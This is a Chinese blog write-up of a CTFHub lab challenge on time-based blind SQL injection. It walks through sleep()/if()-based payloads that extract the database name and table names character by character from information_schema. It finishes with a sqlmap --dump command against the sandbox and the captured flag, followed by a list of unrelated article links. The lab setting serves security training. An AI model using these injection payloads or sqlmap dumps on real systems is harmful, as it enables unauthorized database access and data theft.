CTFHUB技能树之SQL——时间盲注

开启靶场,打开链接:

说明这关对所有信息都做了统一输出,换成延时注入试试

输入:

1 and sleep(15)

(这里不知道为什么加上--+倒是会影响sleep()函数的触发,从而没有延时感)

可以观察到有明显的延时感,确定为时间盲注

(1)爆数据库名

先判断数据库名的长度:

1 and if(length(database())=x,sleep(15),1)

(x是数值1,2,3,4,...)

1 and if(length(database())=4,sleep(15),1)

说明数据库名长度是4

接下来就是判断数据库的各个字符了:

第一个字符:

1 and if(ascii(substr(database(),1,1))>110,sleep(15),1)

1 and if(ascii(substr(database(),1,1))=x,sleep(15),1)

(x是数值1,2,3,4,...)

第二个字符:

1 and if(ascii(substr(database(),2,1))=x,sleep(15),1)

(x是数值1,2,3,4,...)

后续得出数值是(115,113,108,105),即数据库名是sqli

(2)爆表名

先判断表的数量:

1 and if((select count(table_name) from information_schema.tables where table_schema=database())=2,sleep(15),1)

又出现了延时感,说明有两个表

接下来就是判断各个表的各个字符了:

先是第一个表的第一个字符:

1 and if(substr((select table_name from information_schema.tables where table_schema='sqli' limit 0,1),1,1)='n',sleep(15),1)

1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='sqli' limit 0,1),1,1))=110,sleep(15),1)

妈的,不知道为什么这里运行失败,后续手工注入的流程直接看本分组的《Time-based基于时间的盲注》就行了,我要直接用sqlmap跟它爆了

python sqlmap.py -u "http://challenge-1f7b2258309fbd18.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag --dump

得到flag:

ctfhub{3a4d69bf9ae1fc6bbd2f7d69}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/57058.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

vue3+ts+vite--路由跳转,params传参好像丢失了?

vue3+ts+vite--路由跳转,params传参好像丢失了?

前言 相信大家一定写过后台管理系统,有一个很普遍的功能,就是点击编辑,根据id,跳转到相对应的编辑页面,id是通过路由params传递过去了,但是还有一个需求是要将父组件的名称也传递过去 ,过程特别…
阅读更多...
宁波市网站建设让你的网站更吸引人

宁波市网站建设让你的网站更吸引人

宁波市网站建设让你的网站更吸引人 在数字化时代,拥有一个吸引人的网站已成为企业成功的关键因素之一。尤其在宁波市,随着经济的发展和互联网的普及,越来越多的企业意识到网站建设的重要性。那么,如何才能让你的网站更加吸引人呢&…
阅读更多...
webstorm 编辑器配置及配置迁移

webstorm 编辑器配置及配置迁移

1.下载地址 WebStorm:JetBrains 出品的 JavaScript 和 TypeScript IDE 其他版本下载地址 2.安装 点击下一步安装,可根据需要是否删除已有版本 注意: 完成安装后需要激活 3.设置快捷键 以下为个人常用可跳过或根据需要设置 如&#xff1a…
阅读更多...
汽车免拆诊断案例 | 2023款零跑C01纯电车后备厢盖无法电动打开和关闭

汽车免拆诊断案例 | 2023款零跑C01纯电车后备厢盖无法电动打开和关闭

故障现象  一辆2023款零跑C01纯电车,累计行驶里程约为2万km,车主进厂反映,后备厢盖无法电动打开和关闭。 故障诊断  接车后试车,操作后备厢盖外侧、驾驶人侧及遥控钥匙上的后备厢盖开启按钮,可以听到后备厢盖解锁的…
阅读更多...
J1:ResNet-50算法实战与解析(鸟类识别)

J1:ResNet-50算法实战与解析(鸟类识别)

J1周:ResNet-50算法实战与解析(鸟类识别) **理论背景**☕1、CNN算法发展2、ResNet介绍3、ResNet-50介绍1、Input->STAGE 0:2、残差块(STAGE1->STAGE4) **PyTorch实现**1、导入库并设置GPU2、导入和检查数据3、划分数据集4、…
阅读更多...
图示详解OpenEuler下Samba多用户身份验证配置、测试

图示详解OpenEuler下Samba多用户身份验证配置、测试

前言 前文《图例详解OpenEuler下Samba安装、配置和测试》已对Samba服务的工作原理、安装、配置和测试,做了系统的介绍,并对匿名用户的访问samba服务器做了配置,相必读者已对samba服务的流程有了初步、系统的了解,本文在以上基础上…
阅读更多...
C++进阶:哈希

C++进阶:哈希

✨✨所属专栏:C✨✨ ✨✨作者主页:嶔某✨✨ 哈希概念 哈希(hash)⼜称散列,是⼀种组织数据的⽅式。从译名来看,有散乱排列的意思。本质就是通过哈希函数把关键字Key跟存储位置建⽴⼀个映射关系,查找时通过这个哈希函数…
阅读更多...
C语言:符号“->”在C语言中什么意思呢?

C语言:符号“->”在C语言中什么意思呢?

1.C语言中符号“->”的意义: ‌指针中的->表示用于访问指针所指向的结构体或联合体的成员。‌ 这是一个操作符,通常用于简化代码,可以替代使用(*ptr).member的方式。 ->操作符的具体用法是,当你有一个指向结构体的指针时…
阅读更多...
MySQL数据库:基础介绍下载与安装

MySQL数据库:基础介绍下载与安装

数据库基础知识先谈发音MySQL如何发音?在国内MySQL发音有很多种,Oracle官方文档说他们念作My sequal[si:kwəl]。 数据库基本概念 1。数据数据(Data)是指对客观事物进行描述并可以鉴别的符号,这些符号是可识别的、抽…
阅读更多...
【Android】Jetpack入门知识总结(LifeCycle,ViewModel,LiveData,DataBinding等)

【Android】Jetpack入门知识总结(LifeCycle,ViewModel,LiveData,DataBinding等)

文章目录 LifeCycle使用Lifecycle解耦页面与组件自定义控件实现LifecycleObserver接口注册生命周期监听器 使用LifecycleService解耦Service与组件使用ProcessLifecycleOwner监听应用程序生命周期 ViewModel用法在 Fragment 中使用 ViewModel LiveDataDataBinding导入依赖基本用…
阅读更多...
Pandas | 通过PUBG数据集进行数据分析并理解函数使用

Pandas | 通过PUBG数据集进行数据分析并理解函数使用

PUBG数据分析 PUBG数据集train 数据分析iloc和loc 过滤参数人数少的比赛duplicated().count() 和 transform(count)countplot绘图函数 补充:查看判断pd的某一列是否没有重复值方法 1: 使用 duplicated() 方法方法 2: 使用 nunique() 方法方法 3: 使用 value_counts(…
阅读更多...
4418 , TF 卡烧写, 无法启动,TF卡启动报错

4418 , TF 卡烧写, 无法启动,TF卡启动报错

问题: 在使用TF卡烧写的过程中,出现 TF卡无法启动的情况,报错如下: 解决:  我一直以为是 烧写的过程不对,或者是 烧写的uboot 镜像不对,或者是核心板有问题。 但是后来发现,我如果使用 另一台电脑 烧写HMI 的UBOOT的时候,我使用的是同一个 核心…
阅读更多...
边缘计算网关助力煤矿安全远程监控系统

边缘计算网关助力煤矿安全远程监控系统

煤矿开采环境复杂,危险程度高,每一次事故都带给行业血淋淋的教训,安全问题也是政府与行业亟待解决的难题。伴随着技术的发展,煤矿智能化成为行业探索的新方向,降低安全风险也是智能化的重要目标之一。防微杜渐是安全生…
阅读更多...
Markdown编辑器测试文章

Markdown编辑器测试文章

Markdown编辑器测试文章 欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants 创建一个自定义列表如何创建一…
阅读更多...
AI与测试行业调研

AI与测试行业调研

业务方向及应用场景 方向 技术 应用 大语言模型 私有化大模型: llama2 privateGPT 业务分析 测试数据生成 机器学习、深度学习应用 视觉自动化: FastbotApplitools 视觉自动化 缺陷预测与挖掘 知识图谱 neo4j 测试用例生成 精准测试 大语言模…
阅读更多...
WEB前端使用标签制作网页

WEB前端使用标签制作网页

需要使用HTML的一些基本标签制作网页 基本代码如下: <!DOCTYPE html> <html><head><meta charset"utf-8"><title></title></head><body><form action"#" method"post" enctype"text/…
阅读更多...
AI大模型应用开发:手把手教你部署并使用清华智谱GLM大模型

AI大模型应用开发:手把手教你部署并使用清华智谱GLM大模型

部署一个自己的大模型&#xff0c;没事的时候玩两下&#xff0c;这可能是很多技术同学想做但又迟迟没下手的事情&#xff0c;没下手的原因很可能是成本太高&#xff0c;近万元的RTX3090显卡&#xff0c;想想都肉疼&#xff0c;又或者官方的部署说明过于简单&#xff0c;安装的时…
阅读更多...
nginx中的HTTP 负载均衡

nginx中的HTTP 负载均衡

HTTP 负载均衡&#xff1a;如何实现多台服务器的高效分发 为了让流量均匀分配到两台或多台 HTTP 服务器上&#xff0c;我们可以通过 NGINX 的 upstream 代码块实现负载均衡。 方法 在 NGINX 的 HTTP 模块内使用 upstream 代码块对 HTTP 服务器实施负载均衡&#xff1a; upstr…
阅读更多...
Maven与Gradle的区别

Maven与Gradle的区别

Maven与Gradle是两种流行的构建工具&#xff0c;广泛用于Java项目的管理和构建。以下是它们的对比&#xff0c;包括官网、Windows 11配置环境、在IDEA中的相同点和不同点&#xff0c;以及它们各自的优缺点。 官网 Maven官网: https://maven.apache.orgGradle官网: https://gr…
阅读更多...
[Linux网络编程]02-Socket编程

[Linux网络编程]02-Socket编程

一.套接字(Socket) 在通信过程中&#xff0c;套接字一定是成对出现的(通信双方各持一个) 一个文件描述符指向一个套接字(该套接字内部由内核借助两个缓冲区实现读写),即一个套接字只有一个文件描述符&#xff0c;但有两个缓存区&#xff0c;与管道正好相反。 Linux套接字实现…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023